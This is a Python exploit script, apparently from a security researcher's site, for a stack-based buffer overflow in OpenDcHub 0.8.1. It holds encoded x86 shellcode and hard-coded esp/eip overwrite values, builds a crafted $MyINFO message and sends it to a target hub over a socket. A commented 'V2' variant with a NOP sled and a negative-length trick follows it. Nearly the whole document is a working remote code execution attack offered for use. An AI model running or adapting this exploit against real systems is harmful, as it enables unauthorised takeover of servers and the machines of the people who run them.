Indahax - Pierre Noguès


OpenDCHub 0.8.1 Remote Code Execution Exploit

#!/usr/bin/python
#
# OpenDcHub 0.8.1 Remote Code Execution Exploit
# Pierre Nogues - http://www.indahax.com
#
# Description:
#     OpenDcHub is a direct connect hub for Linux
#
#     OpenDcHub does not safely handle a specially crafted $MyINFO message, which leads to a stack-based buffer overflow (in the my_info() handler of commands.c, per the V2 notes at the end of this file).
#
# Affected versions :
#     OpenDcHub 0.8.1
#
# Platforms :
#     Unix
#
# Usage :
#     ./exploit.py

import socket

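host = '192.168.1.9'
port = 5000

# Nick used for both the $ValidateNick login and the $MyINFO command.
NICK = b"joseph"

# The original author notes the shellcode must not contain these bytes; the
# reason is not stated here (presumably the hub's parser treats them
# specially), so they are rejected up front instead of silently producing a
# packet the hub parses differently.
FORBIDDEN_BYTES = (b"\x36", b"\x53", b"\x00")

# Bytes available between "$MyINFO $ALL <nick> " and the "$" separator that
# precedes the overwritten register values.  Anything larger needs the "V2"
# layout at the end of this file.
MAX_SHELLCODE_LEN = 103

# 99-byte x86 payload.  Written as a bytes literal so it is sent as raw bytes
# (not the ASCII text "x33xc9...") and so socket.send accepts it on Python 3.
shellcode = (
    b"\x33\xc9\xb1\x13\xba\xf6\x1d\xe7\xfa\xdb\xde\xd9\x74\x24"
    b"\xf4\x5e\x83\xc6\x04\x31\x56\x0a\x03\xa0\x17\x05\x0f\x7d"
    b"\xf3\x3e\x13\x2e\x40\x92\xbe\xd2\xcf\xf5\x8f\xb4\x02\x75"
    b"\xb4\x66\xf5\xb6\xe3\x97\x37\x51\x9c\x86\x6b\xfb\x0f\xc2"
    b"\x83\x52\xe0\x9b\x45\x17\x6a\xfd\xdd\x55\xea\x58\x59\xbc"
    b"\x5b\x65\xa8\xbf\xd5\xe0\xcb\x90\x8d\x3d\x03\x62\x26\x29"
    b"\x74\xe6\xdf\xc7\x03\x05\x4f\x44\x9d\x2b\xc0\x61\x50\x2b"
    b"\x2b"
)

# Values that land in the overwritten stack frame (little-endian).  They are
# tied to the author's target build/environment (eip = 0xbffef6ed, presumably
# a stack address); another build will need its own values.
OVERWRITE_ESP = b"\x20\x81\x81\x80"  # esp
OVERWRITE_EIP = b"\xed\xf6\xfe\xbf"  # eip


def build_payload(shellcode, nick=NICK):
    """Return the crafted $MyINFO command as bytes.

    Layout, in order:
      "$MyINFO $ALL <nick> " | shellcode padded with "A" to 103 bytes |
      "$" | 4-byte esp | 4-byte eip | "S:-1|"

    Args:
        shellcode: raw payload bytes, at most MAX_SHELLCODE_LEN long.
        nick: nick to place in the command; must match the validated nick.

    Raises:
        ValueError: if the shellcode is too long (the original script
            silently skipped the padding in that case, breaking the offsets)
            or contains one of FORBIDDEN_BYTES.
    """
    if len(shellcode) > MAX_SHELLCODE_LEN:
        raise ValueError(
            "shellcode is %d bytes, max is %d; use the V2 layout"
            % (len(shellcode), MAX_SHELLCODE_LEN)
        )
    bad = [b for b in FORBIDDEN_BYTES if b in shellcode]
    if bad:
        raise ValueError("shellcode contains forbidden byte(s): %r" % (bad,))

    padding = b"A" * (MAX_SHELLCODE_LEN - len(shellcode))
    return b"".join([
        b"$MyINFO $ALL ", nick, b" ",
        shellcode, padding,
        b"$",
        OVERWRITE_ESP,
        OVERWRITE_EIP,
        b"S:-1|",
    ])


def main():
    """Connect to the hub, log in with NICK, send the crafted $MyINFO, close."""
    payload = build_payload(shellcode)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((host, port))
        # Keep the original order: validate the nick before sending $MyINFO.
        # sendall() rather than send(): send() may write only part of the
        # buffer, which would truncate the payload without any error.
        s.sendall(b"$ValidateNick " + NICK + b"|")
        s.sendall(payload)
    finally:
        s.close()


if __name__ == "__main__":
    main()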

"""
# V2
# A more complex variant that also works; it leaves more room for the shellcode.

hax="$MyINFO $ALL joseph AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
hax+="xFFxFFxFFxFE" # local var int len of commands.c:my_info() must be a negative value
hax+="TTTTUUUUVVVVWWWWXXXXYYYYZZZZBBBBCCCCEEEEEEE$"
hax+="x20x81x81x80" # esp
hax+="x80xf7xfexbf" # eip
hax+="xCCxCCxCCxCC" # useless var
hax+="x10xf0xfexbf" # this address + x20 will be overwritten by 4 bytes
# shellcode time
hax+="x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
hax+="x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
hax+=shellcode
hax+="|"
"""